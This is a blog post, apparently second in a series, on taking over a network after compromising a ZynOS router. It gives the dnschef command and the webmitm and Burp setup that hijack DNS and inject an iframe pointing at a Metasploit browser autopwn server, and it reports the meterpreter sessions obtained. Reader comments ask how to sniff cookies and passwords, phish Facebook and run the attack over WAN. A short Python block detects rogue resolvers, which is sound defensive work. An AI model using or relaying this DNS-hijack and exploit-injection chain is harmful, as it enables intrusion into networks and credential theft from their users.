Hello again 🙂
I’m going to recap from the last post. So what I’m about to demonstrate in this post is the impact an attacker can cause to your network once he has access to the router ..
We have access to the router, but our goal is to get a foothold on the remote network. Hmm .. we have the port forwarding option, which is beautiful: what we can do with that is scrape the network pool for internal IPs, forward ports like 445 and 139, and try to exploit them from our end. But imagine a network with 200 machines; that will definitely be time consuming .. and even if you write a script to automate that, what makes you believe that you’re actually going to be able to get meterpreter sessions ?
So .. what’s the solution ?
Hmm, DNS is an interesting thing to look at, since we can give the router a DNS server IP for the whole network to use !!
Are we talking about DNS intercepting ? Hell yeah 😀
Here is a list of the tools we’re going to use :
Dnschef : A dns proxy ( read about it HERE )
Metasploit : How to install ( ubuntu ) HERE
Webmitm : Find out more about it HERE
Burp Suite : It’s available HERE
-Attacking from ubuntu “Metasploit & dnschef & webmitm” running on (IP: 192.168.0.6)
-Burp suite will be running at (IP:192.168.0.10)
First, I’ll explain how I’m going to do the attack :
We’re going to set up our Dnschef proxy
./dnschef.py --interface 192.168.1.106 --fakeip 192.168.1.106
--interface : tells dnschef which interface to listen on .
--fakeip : hijacks requests by returning this IP as the result for every request
The next step is to launch the webmitm tool, which will handle the HTTP requests and responses. From there we’ll tell webmitm to forward the traffic to the burp suite proxy, which will allow us to inject an iframe of the Metasploit browser autopwn server.
We have to configure burp suite so that it handles requests on port 80
It has to be invisible ..
Repeat these steps for port 443 to handle HTTPS traffic .
Ok, so everything is ready now .. I’ll have to modify the scripts I provided in the previous post so that we can inject our DNS server .
This way I injected my IP address as the first DNS server to use on the router, and the 2nd one is the one that belongs to google. So if we want to stop the attack on the already injected routers by blocking requests made to our DNS server, the router will automatically proceed to the 2nd server that belongs to google without showing any DNS resolution error on the victim end.
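Seen from the defender's side, both behaviours described above leave traces: a router whose first DNS server is not one you configured, and a resolver that returns the same IP for every name (the --fakeip behaviour). The following is an added example, not code from the original post; the allowlist, the router DNS list, the log tuples and the function names are all constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Assumption: resolvers this site intends its routers to hand out.
APPROVED_RESOLVERS = {"8.8.8.8", "8.8.4.4"}

# Constructed sample: DNS servers read back from a router's settings.
ROUTER_DNS = ["192.168.0.6", "8.8.8.8"]

# Constructed sample log: (resolver that answered, queried name, A record).
DNS_LOG = [
    ("192.168.0.6", "www.example.com", "192.168.0.6"),
    ("192.168.0.6", "mail.example.com", "192.168.0.6"),
    ("192.168.0.6", "login.example.org", "192.168.0.6"),
    ("192.168.0.6", "cdn.example.net", "192.168.0.6"),
    ("8.8.8.8", "www.example.com", "198.51.100.7"),
    ("8.8.8.8", "login.example.org", "203.0.113.10"),
    ("8.8.8.8", "cdn.example.net", "203.0.113.25"),
]

def unapproved_resolvers(configured, approved):
    """Configured DNS servers that are not on the allowlist, in order."""
    return [r for r in configured if r not in approved]

def _site(qname):
    # Rough grouping by last two labels so www/mail of one site count once.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def collapsed_answers(log, min_sites=3):
    """Flag (resolver, IP) pairs where one IP answers >= min_sites sites.

    Shared hosting and CDNs also map many names to one IP, so each finding
    records whether the IP is private, which is unusual for an Internet site.
    """
    sites = defaultdict(set)
    for resolver, qname, answer in log:
        sites[(resolver, answer)].add(_site(qname))
    return [
        {"resolver": r, "answer": ip, "sites": len(names),
         "private": ipaddress.ip_address(ip).is_private}
        for (r, ip), names in sorted(sites.items())
        if len(names) >= min_sites
    ]

if __name__ == "__main__":
    print("unapproved:", unapproved_resolvers(ROUTER_DNS, APPROVED_RESOLVERS))
    for finding in collapsed_answers(DNS_LOG):
        print("collapsed:", finding)
```

Because the second DNS entry stays legitimate, resolution errors never appear on the client side, so the configuration audit is the check that catches the change even when the rogue resolver is offline.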
Ok, so now we’ll have to launch the browser autopwn module on metasploit .
PS: I’ll be using port “8080” because webmitm is already using port “80” to forward traffic .
It’s loaded and waiting for victims to browse 🙂
Ok, so from here we’ll have to add the iframe injection to burp suite, so that when it gets a response for a page requested by the victim, it injects an iframe with “http://192.168.0.6:8080/”, which is where Metasploit is listening.
After injecting my DNS server into the victim router using the scripts, and after setting up everything from dnschef to metasploit, let’s follow what happens if a victim browses to a website .
We got 3 meterpreter sessions :D
DO YOU REALIZE WHAT SOMEONE CAN DO IF HE HACKS INTO YOUR ROUTER WITH SOME VULNERABILITY OR JUST DEFAULT PASSWORDS THAT YOU DIDN’T CHANGE ?
If you have any questions or comments, feel free to contact me. And as always : Happy Hacking 🙂
27 thoughts on “ZynOS – Part 2 ( Taking over the network )”
great job dude
that’s what i call automation
very nice job ….
i have a question …
what can i do if i want to sniff data such as cookies or passwords from data in the router ?
i mean don’t use Metasploit …. just sniffing data or phishing some website like facebook…
sorry for spam
Hi, thanks for your comments . Well, I understand what you are willing to do .. so what i recommend is just proceed with the steps i provided and then launch your wireshark or any other packet sniffing software and then you should see data, basically all of the victim’s traffic is going through your computer 🙂 .
I hope this helps ..
tanQ i use dnschef and webmitm -d and then i run dsniff and it works well. now i want to change the script because it uses subnet CIDR …. and i want to use ip range :
you use IPNetwork subnet :
for ip in IPNetwork('0.0.0.1/24'):
and i want to use ip range
for example :
netaddr.iprange_to_cidrs('0.0.0.1 , 255.255.255.255'):
any idea ?
tanq brother 🙂
this site is no longer available : http://22.214.171.124/zynos.php !!
http://126.96.36.199/zynos here it is 😉
123 long live Algeria 😉
sorry coz i’m so bad in english & i wanna learn from u if u want, but in arabic
is there anyway to contact u ?
any one can give the zynos.php source code
Nasro can u make this tutorial in short video please
i got some error when i use dnschef
Great Tutorial …. but how will packets forwarded automatically from burpsuite proxy
if you followed the tutorial then burpsuite should play a role of MITM ( INTERNET — BURP — VICTIM ).
Hi Bro , it’s Great Job nd Thnx For what you do 😉
i have a problem when i injected my ip to server dns route of victim , it’s not working ? i don’t understand that ! i try with all ways so can you explain to me ?!!
Hi nasro,, can i contact u via email?
Hi Bro , ur attack misses only one thing 😉 , what if the targeted router is not accessible from outside (public network) , well the answer is here http://www.youtube.com/watch?v=r13ESXEfQVE ,
it’s a great code by python that one for zynos attack… but i can’t get results as the str1 is empty!! or the result of the decoded.php is something like “There was an error uploading the file, please try again!”.. like when you access the page like this”
any help please?
that’s good !!
while running the script im getting the following error
Traceback (most recent call last):
File “C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py”, line 1, in
from netaddr import IPNetwork
ImportError: No module named netaddr
You’ll need to install the “netaddr” module for python.
ok so i got everything set up. but where do i find ip for burpsuite? and when i do browse it comes up with burp saying something. i also tried this and set up a server via Setoolkit. and to set dnschef fakedomain=facebook.com. did not work also tried setting up sslstrip but no joy. thanks for this anyways.
but you got a private ip if the router isnt your ?!
how to do this over wan ?!
Hi. This is the only article I have found on this. I have some questions.
Sorry if they are noob questions.
I am running kali linux.
Is this possible without running Burp on a different IP?
Assuming , I have a remote router’s login, what IP would I put in the router’s Static DNS to point all client requests to my NOIP for se toolkit attacks?
If that is not possible what IP can I put in there just to monitor traffic?
Noobest question ..How do I make my NoIP address a DNS server?